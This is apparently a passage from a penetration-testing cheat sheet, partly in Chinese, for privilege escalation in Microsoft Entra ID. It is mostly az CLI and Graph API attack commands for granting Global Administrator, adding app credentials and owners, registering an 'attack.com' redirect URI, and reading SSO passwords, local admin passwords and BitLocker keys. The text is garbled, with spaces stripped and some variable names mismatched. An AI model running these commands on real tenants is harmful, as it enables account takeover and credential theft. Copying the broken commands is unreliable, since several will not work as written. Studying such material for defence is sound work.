# List enabled built-in rolesazrest--methodGET \--uri "https://graph.microsoft.com/v1.0/directoryRoles"# Give role (Global Administrator?) to a userroleId="<roleId>"userId="<userId>"azrest--methodPOST \--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \--headers "Content-Type=application/json" \--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"
向角色添加更多权限:
# List only custom rolesazrest--methodGET \--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions"|jq'.value[] | select(.isBuiltIn == false)'# Change the permissions of a custom roleazrest--methodPATCH \--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \--headers "Content-Type=application/json" \--body '{"description": "Update basic properties of application registrations","rolePermissions": [{"allowedResourceActions": ["microsoft.directory/applications/credentials/update"]}]}'
# Generate a new password without overwritting old onesazadappcredentialreset--id<appId>--append# Generate a new certificate without overwritting old onesazadappcredentialreset--id<appId>--create-cert
# Get current redirect urisazadappshow--idea693289-78f3-40c6-b775-feabd8bef32f--query"web.redirectUris"# Add a new redirect URI (make sure to keep the configured ones)azadappupdate--id<app-id>--web-redirect-uris"https://original.com/callback https://attack.com/callback"
# Add new ownerspId="<spId>"userId="<userId>"azrest--methodPOST \--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \--headers "Content-Type=application/json" \--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"azadspcredentialreset--id<sp-id>--append# You can check the owners withazadspownerlist--id<spId>
# Generate SSO creds for a user or a groupspID="<spId>"user_or_group_id="<id>"username="<username>"password="<password>"azrest--methodPOST \--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \--headers "Content-Type=application/json" \--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"# Get credentials of a specific credIDcredID="<credID>"azrest--methodPOST \--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \--headers "Content-Type=application/json" \--body "{\"id\": \"$credID\"}"
#e.g. change manager of a uservictimUser="<userID>"managerUser="<userID>"azrest--methodPUT \--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \--headers "Content-Type=application/json" \--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'#e.g. change department of a userazrest--methodPATCH \--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \--headers "Content-Type=application/json" \--body "{\"department\": \"security\"}"
此权限允许攻击者读取 Microsoft Entra 加入设备的备份本地管理员帐户凭据的属性,包括密码
# List deviceLocalCredentialsazrest--methodGET \--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"# Get credentialsdeviceLC="<deviceLCID>"azrest--methodGET \--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \
BitlockerKeys
microsoft.directory/bitlockerKeys/key/read
此权限允许访问 BitLocker 密钥,这可能使攻击者能够解密驱动器,从而危及数据机密性。
# List recovery keysazrest--methodGET \--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"# Get keyrecoveryKeyId="<recoveryKeyId>"azrest--methodGET \--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"